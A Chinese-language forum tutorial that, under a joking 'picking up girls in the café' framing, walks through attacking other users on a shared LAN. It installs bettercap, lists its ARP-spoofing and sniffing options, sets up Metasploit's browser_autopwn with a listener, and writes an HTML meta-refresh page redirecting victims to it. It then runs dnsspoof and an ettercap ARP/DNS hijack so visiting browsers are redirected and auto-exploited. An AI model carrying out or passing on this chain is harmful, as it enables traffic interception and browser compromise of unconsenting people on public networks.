各位小司机你们好吗,记以前出过一个系列如何在咖啡厅等局域网场合内轻松泡到妹子后.本司机收到了好多小司机的反应说教程好可以,然而最近好无聊好无聊,本司机又想去那个啥了,然后给你们写了下列文章。
今天用到的三款大家熟悉的工具,bettercap,ettercap,MSF。这三款工具。【个人喜欢用ettercat不过ettercap很成功,但在新时代下它已经老了 ettercap的过滤器复杂,使用门槛高,在大型网络下,主机发现功能效果很差.优化不够,对研究人员来说,无用的功能太多 ,扩展性不够,开发需要掌握C/C++语言 所以我们要逐渐的放弃ettercap 不过还是有喜欢用的朋友,我会做两个版本的相关文章给大家演示的。
安装:
[C] 纯文本查看 复制代码
git clone [url]https://github.com/evilsocket/bettercap[/url] cd bettercap gem build bettercap.gemspec sudo gem install bettercap*.gem
如果报错,如图:
执行如下命令:
[C] 纯文本查看 复制代码
sudo apt-get install ruby-dev libpcap-dev sudo gem install bettercap*.gem
成功安装,下面是搜集的参数。
[HTML] 纯文本查看 复制代码
-I, –interface IFACE 指定Network interface name,默认eth0 -S, –spoofer NAME 指定欺骗模块,此参数默认为ARP,目前仅支持ARP,新版本会添加更多选项 -T, –target ADDRESS 指定单一ip,如果未设置,则代表所有子网,子网所有主机自动扫描,简单高效,十分推荐 -O, –log LOG_FILE 日志功能 -D, –debug 调试功能,会将每一步操作详细记录,便于调试 -L, –local 解析流经本机的所有数据包(此操作会开启嗅探器),此参数默认为关闭 -X, –sniffer 开启嗅探器. –sniffer-pcap FILE 将数据包保存为PCAP文件,可用Wireshark打开(此操作会开启嗅探器) –sniffer-filterEXPRESSION 配置嗅探器使用BPF过滤器(此操作会开启嗅探器) -P, –parsers PARSERS 指定数据包(此操作会开启嗅探器),支持NTLMSS, IRC, POST, URL, FTP, HTTPS, HTTPAUTH, MAIL,此参数默认为所有 –no-discovery 只使用当前的ARP缓存,不去扫描其他主机,此参数默认为关闭 –no-spoofing 关闭欺骗模块,也可以使用参数–spoofer NONE代替 –proxy 启用HTTP代理并且重定向所有HTTP请求至本机,此参数默认为关闭 –proxy-port PORT 设置HTTP代理端口,此参数默认为8080 –proxy-module MODULE 指定加载的Ruby模块 –httpd 开启HTTP服务器,此参数默认为关闭 –httpd-port PORT 指定HTTP server port, 此参数默认为8081. –httpd-path PATH 指定HTTP server path,此参数默认为 ./. -h, –help 英文帮助
然而ettercap系统自带的所以不用掩饰。
首先我们要开启
[C] 纯文本查看 复制代码
service postgresql start
打开MSF
我们利用的是Browser_autopwn模块这是一个自动攻击浏览器的模块。它会自动感应攻击目标的浏览器并且对它发动适当的攻击。
命令:
[C] 纯文本查看 复制代码
use server/browser_autopwn
我们来设置我们的IP
命令:
[C] 纯文本查看 复制代码
set uripath /
命令:
[C] 纯文本查看 复制代码
set LHOST (你的IP地址)
运行命令:
[C] 纯文本查看 复制代码
run
然后他会自动加载所以模块,加载好的样子。
我们执行arp攻击
[C] 纯文本查看 复制代码
bettercap -X
我们要创建一个dns欺骗的页面需要转到我们的那个端口。
打开我们KALI index.html
[C] 纯文本查看 复制代码
/var/www/html/index.html
[HTML] 纯文本查看 复制代码
<html> <head> <title>ichunqiu.com</title> <meta http-equiv="refresh" content="0;url=http://192.168.159.128:8080/"> <body> <p>i am ichunqiu.com</p> <p>ichunqiu.com</p> </body> </head> </html>
然后我们开启apache2
[C] 纯文本查看 复制代码
etc/init.d/apache2 start
开始dns欺骗:
[C] 纯文本查看 复制代码
dnsspoof -f /var/www/html/index.html
下面的情况可想而知....打开的页面会跳转到 http://192.168.159.128:8080/ 然后进行模块的匹配达到上线的目的。
ettercap文章我拿以前我写的给大家看思路都是一样的.
首先我们要修改一下ettercap里面的DNS劫持文件的数据修改成所有网站都替换成我们的DNS.
在对应的位置添加对应的 标识和IP地址 * 代表所有域名 后边就是你要欺骗为的IP地址,这里是当然是我自己的主机IP地址啦然后记得保存。
然后再来搭建一个web页面
编辑/var/www/html/index.html文件
改成你定义页面 这里我简单的写了一个html的主页。
我们在终端下打开ettercap的图像化界面!
输入命令:ettercap -G
弹出来一个图形化界面,我们首先需要点击Sniff 然后选择Unified sniffng 。
它会弹出让我们选择网卡,上节课我们介绍过了如何查找自己的网卡设备我就不再介绍了 然后我们确定。
我们扫描一下我们的局域网内的主机 我们也可以用快捷方式来进行操作 Ctrl+s 可以快速扫描。
扫描完成以后我们打开扫描好的自己信息也可以Ctrl+h打开。
我们把网关添加到Add to Target 1 右键添加Add to Target 2 添加攻击IP
这是添加好的样子。
然后点mitm --- arp posoning ,勾选sniff remote connections:
然后我们在选择 plugins 然后选择第一个选项 也可以用快捷方式Ctrl+p
进行欺骗DNS!
之后start --- start sniffing开始监听 然后欺骗成功!!!!